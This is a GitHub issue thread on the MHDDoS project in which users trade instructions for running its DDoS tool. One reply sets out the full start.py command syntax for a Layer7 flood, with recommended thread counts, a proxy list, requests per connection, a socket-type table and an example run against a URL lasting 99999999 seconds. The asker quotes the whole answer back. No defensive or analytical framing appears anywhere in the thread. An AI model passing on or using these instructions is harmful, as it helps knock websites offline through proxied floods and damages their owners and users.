### ISSUE TITLE
run syntax

### ISSUE THREAD

**Issue by superdream3** [MHProDev/MHDDoS#232]
Is there a tutorial

**Comment by cold9999** [comment]
Layer7 : `python3` `start.py` `method`(Layer7 Methods) URL(put url) `socket_type` `threads`(I recommand 1000~5000 | if you extremely set up this, You will see a error about it couldn't make a threads) `http_proxies.txt` `RPC`(if you don't know about this, just put 100) `seconds`(Yeah this doesn't contain INFINITE) `debug`(This is Option. if you put anything is this, You can watch the logs(PPS,BPS)

example : `python3 start.py GET https://example.com/ 1 1000 http_proxies.txt 100 99999999 9`

socket_type
`> ALL : 0
> HTTP : 1
> SOCKS4 : 4
> SOCKS5 : 5
> RANDOM : 6`

**Comment by SudoLite** [comment]
https://github.com/MHProDev/MHDDoS/wiki

**Comment by superdream3** [comment]
> Layer7 : 
> `python3` `start.py` `method`(Layer7 Methods) URL(put url) `socket_type` `threads`(I recommand 1000~5000 | if you extremely set up this, You will see a error about it couldn't make a threads) `http_proxies.txt` `RPC`(if you don't know about this, just put 100) `seconds`(Yeah this doesn't contain INFINITE) `debug`(This is Option. if you put anything is this, You can watch the logs(PPS,BPS)
> 
> - 
> 
> example : `python3 start.py GET https://example.com/ 1 1000 http_proxies.txt 100 99999999 9`
> 
> `socket_type`
> > ALL : 0
> > HTTP : 1
> > SOCKS4 : 4
> > SOCKS5 : 5
> > RANDOM : 6

Thank you for your answer
